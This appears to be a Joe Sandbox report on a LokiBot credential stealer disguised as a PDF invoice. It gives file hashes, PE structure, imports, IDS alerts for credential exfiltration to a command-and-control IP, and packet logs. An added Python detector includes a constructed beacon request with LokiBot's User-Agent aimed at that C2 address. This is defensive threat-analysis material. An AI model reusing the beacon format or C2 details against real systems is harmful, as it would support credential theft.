https://doc-0g-8k-docs.googleusercontent.com/ | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.161 | googlehosted.l.googleusercontent.com | United States | | 15169 | GOOGLEUS | false
157.245.36.27 | unknown | United States | | 14061 | DIGITALOCEAN-ASNUS | true
142.250.185.238 | drive.google.com | United States | | 15169 | GOOGLEUS | false
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756301
                                Start date and time:2022-11-30 00:29:09 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                Run name:Suspected Instruction Hammering
Number of new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@4/6@2/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 30.1% (good quality ratio 29.4%)
                                • Quality average: 88.5%
                                • Quality standard deviation: 21.7%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                No simulations
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):38632
                                Entropy (8bit):5.840976252158136
                                Encrypted:false
                                SSDEEP:768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
                                MD5:ED609F8F09DE8AAA4F8CFF0285E0420A
                                SHA1:A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
                                SHA-256:2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
                                SHA-512:32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29309
                                Entropy (8bit):7.9930541941014255
                                Encrypted:true
                                SSDEEP:768:E49NB/CsjPddY0nfj1fIXSgH0uO7wt1WayrQ0bThetG:nlCsxfVIXHH2wOfKG
                                MD5:849FDC040AA117FC8B8AC03C745C690D
                                SHA1:831EE9C0B27F05069A323940A7C581CA21C9BE68
                                SHA-256:3C6382D1FD4C832B2BBD7CDD2508DDAA80BF40D17732C8B17C31D70CED631A79
                                SHA-512:A5F45B85DAD9FD26B7B111F402467D33B92E01F9C13CD4C2932FA53617746C246393BFEF020DAEE78F4C4515BABA2B50461DA761607CD97A200B3E2206BB08A6
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):141909
                                Entropy (8bit):7.124693631306355
                                Encrypted:false
                                SSDEEP:3072:COxlLD2mpgf8pOxNjQzNUflgAG63+OAyam6kxnv:COxlmcg5EzuNG6MyaJSv
                                MD5:0A951AA33DE8994CBE161F0E07F169B8
                                SHA1:38033C58EEFF600D22A068F1A7F599646BDFDD1E
                                SHA-256:4A98204499C5BA9F9518D6A7EF078A5A5F0B82173919E9A5D41179172BD28F60
                                SHA-512:F9BE445FDBD89EB0F5CACBB325D89E89755906F1DADE3A7E32593E4ADFCBFF2C8927350226BB8FD0238B4F8F72377F757ADCDAFE20C7FA2FF41C4A14814D8A27
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):11776
                                Entropy (8bit):5.656065698421856
                                Encrypted:false
                                SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 2%
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):1.1262763721961973
                                Encrypted:false
                                SSDEEP:3:/lSllIEXln:AWE1
                                MD5:D69FB7CE74DAC48982B69816C3772E4E
                                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                Malicious:false
                                Preview:........................................user.
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.875386203366202
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File size:194987
                                MD5:b9f70f4146b846179fa182ac868d0c15
                                SHA1:97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
                                SHA256:ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be
                                SHA512:2cc45205394074ddf9a5481a81b89582d84d42a34023329e06cf589c455c2fef144905362b5d1001e26026480d490304b6ac96526ab32f5344b1706d98ceff48
                                SSDEEP:3072:MRD+3q3NxPTNuY/bQZFler2MUPaSa1y8XKdV06k55ohchNqV3AzlbEnJZGqItyWJ:mwq3NpNSFleCMUPVaidHXMNqwlInJ0q8
                                TLSH:A714125533E0C523CAF202702DBB652F9EE9A642E262FF131360AF9D7D56307864C356
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@
                                Icon Hash:b2a88c96b2ca6a72
                                Entrypoint:0x40344a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                Instruction
                                sub esp, 000002D4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [esp+14h], ebx
                                mov dword ptr [esp+10h], 0040A230h
                                mov dword ptr [esp+1Ch], ebx
                                call dword ptr [004080B4h]
                                call dword ptr [004080B0h]
                                cmp ax, 00000006h
                                je 00007FED94512513h
                                push ebx
                                call 00007FED9451566Ch
                                cmp eax, ebx
                                je 00007FED94512509h
                                push 00000C00h
                                call eax
                                mov esi, 004082B8h
                                push esi
                                call 00007FED945155E6h
                                push esi
                                call dword ptr [0040815Ch]
                                lea esi, dword ptr [esi+eax+01h]
                                cmp byte ptr [esi], 00000000h
                                jne 00007FED945124ECh
                                push ebp
                                push 00000009h
                                call 00007FED9451563Eh
                                push 00000007h
                                call 00007FED94515637h
                                mov dword ptr [0042A244h], eax
                                call dword ptr [0040803Ch]
                                push ebx
                                call dword ptr [004082A4h]
                                mov dword ptr [0042A2F8h], eax
                                push ebx
                                lea eax, dword ptr [esp+34h]
                                push 000002B4h
                                push eax
                                push ebx
                                push 004216E8h
                                call dword ptr [00408188h]
                                push 0040A384h
                                push 00429240h
                                call 00007FED94515220h
                                call dword ptr [004080ACh]
                                mov ebp, 00435000h
                                push eax
                                push ebp
                                call 00007FED9451520Eh
                                push ebx
                                call dword ptr [00408174h]
                                add word ptr [eax], 0000h
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0xb48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61f1 | 0x6200 | False | 0.6656967474489796 | data | 6.477074763411717 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x13a4 | 0x1400 | False | 0.4529296875 | data | 5.163001655755973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20338 | 0x600 | False | 0.501953125 | data | 3.9745558434885093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x3e000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0xb48 | 0xc00 | False | 0.4228515625 | data | 4.372183800985918 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x691c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
RT_DIALOG | 0x694a8 | 0x100 | data | English | United States
RT_DIALOG | 0x695a8 | 0x11c | data | English | United States
RT_DIALOG | 0x696c8 | 0xc4 | data | English | United States
RT_DIALOG | 0x69790 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x697f0 | 0x14 | data | English | United States
RT_MANIFEST | 0x69808 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/30/22-00:31:37.333969 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49838 | 80 | 192.168.11.20 | 157.245.36.27
11/30/22-00:31:37.333969 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49838 | 80 | 192.168.11.20 | 157.245.36.27
11/30/22-00:31:37.333969 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49838 | 80 | 192.168.11.20 | 157.245.36.27
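All three alerts fire on the same packet of the HTTP beacon from 192.168.11.20:49838 to 157.245.36.27:80. As an added example (not Joe Sandbox or Emerging Threats code), the Python below reproduces offline the two checks an analyst would run over a raw HTTP request: the "Charon; Inferno" User-Agent marker the ET rule name refers to, and, as a weaker secondary signal, a POST carrying a body to a Host header that is a bare IPv4 address, which is how the C2 is reached in this run. The full User-Agent string "Mozilla/4.08 (Charon; Inferno)" is LokiBot's well-known one but is not printed on this page, so it is an assumption here; the two sample requests are constructed, not taken from the capture.

```python
"""Toy HTTP request inspector modelled on the three ET alerts above.

Added example, not Joe Sandbox or Emerging Threats code.  Checks:
  * User-Agent contains the LokiBot marker "Charon; Inferno" (the rule name
    on the report only says "(Charon/Inferno)"; the full UA string
    "Mozilla/4.08 (Charon; Inferno)" is assumed here).
  * A POST with a body to a Host header that is a bare IPv4 address, as the
    C2 157.245.36.27:80 is reached in this run (no DNS name involved).
The sample requests below are constructed, not captured from the sample.
"""
from __future__ import annotations

import ipaddress
import re

LOKIBOT_UA_MARKER = re.compile(r"Charon;\s*Inferno", re.IGNORECASE)


def parse_http_request(raw: bytes) -> tuple[str, str, dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def host_is_bare_ip(host: str) -> bool:
    """True when the Host header is an IPv4 literal (optionally with :port)."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False


def inspect_http_request(raw: bytes) -> list[str]:
    """Return the findings for one request; an empty list means nothing flagged."""
    method, _path, headers, body = parse_http_request(raw)
    findings = []
    if LOKIBOT_UA_MARKER.search(headers.get("user-agent", "")):
        findings.append("lokibot-user-agent")
    if method == "POST" and body and host_is_bare_ip(headers.get("host", "")):
        findings.append("post-to-bare-ip")
    return findings


# Constructed C2 beacon: path and body are placeholders, not from the capture.
LOKIBOT_SAMPLE = (
    b"POST /panel/upload.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 157.245.36.27\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 8\r\n"
    b"\r\n"
    b"\x12\x00\x00\x00\x27\x00\x00\x00"
)

# Constructed benign request resembling the Google Drive download in this run.
BENIGN_SAMPLE = (
    b"GET /uc?export=download HTTP/1.1\r\n"
    b"Host: drive.google.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, req in (("lokibot", LOKIBOT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, inspect_http_request(req) or ["clean"])
```

The bare-IP check on its own is noisy on real networks (software updaters and CDN probes also POST to literal IPs); it is useful as a second condition alongside the User-Agent marker, which is the signal the ET rule actually keys on.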
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 00:31:35.123769999 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.123786926 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.124044895 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.137362957 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.137372017 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.172802925 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.173031092 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.173213005 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.173417091 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.173674107 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.302972078 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.304261923 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.304462910 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.308245897 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.348491907 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.606657982 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.606863022 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.606874943 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.607048035 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.608479023 CET | 49836 | 443 | 192.168.11.20 | 142.250.185.238
Nov 30, 2022 00:31:35.608555079 CET | 443 | 49836 | 142.250.185.238 | 192.168.11.20
Nov 30, 2022 00:31:35.794887066 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.794929981 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.795146942 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.795490026 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.795507908 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.858731031 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.858937979 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.859126091 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.860200882 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.860357046 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.860357046 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.864449978 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.864485025 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.864960909 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:35.865122080 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.865542889 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:35.912424088 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.193646908 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.193851948 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.194185972 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.194263935 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.194359064 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.194547892 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.195283890 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.195485115 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.195549965 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.195982933 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.196171045 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.196225882 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.196439028 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.198167086 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.198345900 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.198385954 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.198849916 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.201076031 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.201406956 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.203979969 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.204233885 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.204291105 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.204576015 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.204622984 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.204778910 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.204869986 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.204936028 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.204979897 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.205188990 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.205256939 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.205456018 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.205496073 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.205528975 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.205698967 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.205699921 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.206115007 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.206336021 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.206392050 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.206670046 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.206896067 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.207021952 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.207073927 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.207273006 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.207426071 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
Nov 30, 2022 00:31:36.207664013 CET | 49837 | 443 | 192.168.11.20 | 142.250.185.161
Nov 30, 2022 00:31:36.207719088 CET | 443 | 49837 | 142.250.185.161 | 192.168.11.20
